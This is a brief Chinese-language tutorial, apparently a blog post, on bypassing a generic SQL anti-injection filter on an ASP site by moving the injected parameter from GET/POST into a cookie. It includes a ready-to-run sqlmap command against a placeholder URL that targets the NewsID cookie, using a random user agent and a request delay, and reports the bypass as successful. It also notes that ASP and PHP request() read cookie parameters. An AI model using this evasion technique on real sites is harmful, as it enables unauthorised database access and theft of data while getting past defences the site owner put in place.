SQL注入-绕过SQL通用防注入系统

当我们输入特殊字符，类似于单引号，and，or等时，经常会被注入系统拦截，并且这种是没有记录日志的。

现在我们尝试绕过，get型的请求会被拦截，那post呢。

emmm....也被拦了

这个站点是asp的，那我们尝试用cookie传参，

 我们发现没有被防注入系统拦截。

因此构造sqlmap语句

 

sqlmap.py -u "http://www.xxxxx.com/xxxx/xxxx.asp?xx=aa&xxx=aa" --cookie "NewsID=4346" --level 2 --random-agent --batch --delay 3  -p NewsID 

成功绕过

 目前能接收cookie参数的有asp、还有php的request()函数